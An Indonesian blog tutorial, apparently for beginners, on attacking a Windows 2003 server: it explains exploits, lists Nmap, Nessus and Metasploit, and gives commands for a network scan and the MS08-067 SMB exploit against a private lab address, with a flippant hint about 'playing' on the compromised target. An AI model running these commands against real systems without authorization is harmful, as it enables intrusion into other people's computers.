Exploit Windows menggunakan Metasploit di Linux.Sebelum kita membahasa tentang cara exploit windows menggunakan metasploit ini ada baiknya kita mengetahui apa arti dari exploit itu sendiri. Exploit adalah sebuah kode yang menyerang keamanan_komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan (wikipedia). Sedangkan Metasploit sendiri merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem. Pertama, kita harus menyiapkan beberapa tools:
- Nmap: (Network Mapper) sebuah aplikasi atau tool yang berfungsi untuk melakukan port scanning.
- Nessus: aplikasi yang digunakan untuk mengetahui celah-celah keamanan dari sebuah komputer.
- Metasploit: Sofware security yang digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Kali ini saya menggunakan BackBox versi 2.0.5
1. Scan network menggunakan nmap.
#nmap 192.168.1.0/24
berikut adalah pict dari port windows 2003 server (target)
2. Gunakan Nessus untuk mencari celah keamanan windows tersebut. Berikut beberapa screenshoot yang saya dapat.
4. Ketikkan perintah:
# search ms08_067
# use windows/smb/ms08_067_netapi
# show options
# set RHOST 192.168.1.3
# exploit
Jika perintah tersebut berhasil, maka anda diperbolehkan untuk berkreasi pada komputer target :p
Screenshoot sudah saya sediakan pada “gallery” diatas. Tutorial Hacking ini digunakan untuk pembelajaran, gunakan dengan bijaksana.!!
0 comments:
Speak up your mind
Tell us what you're thinking... !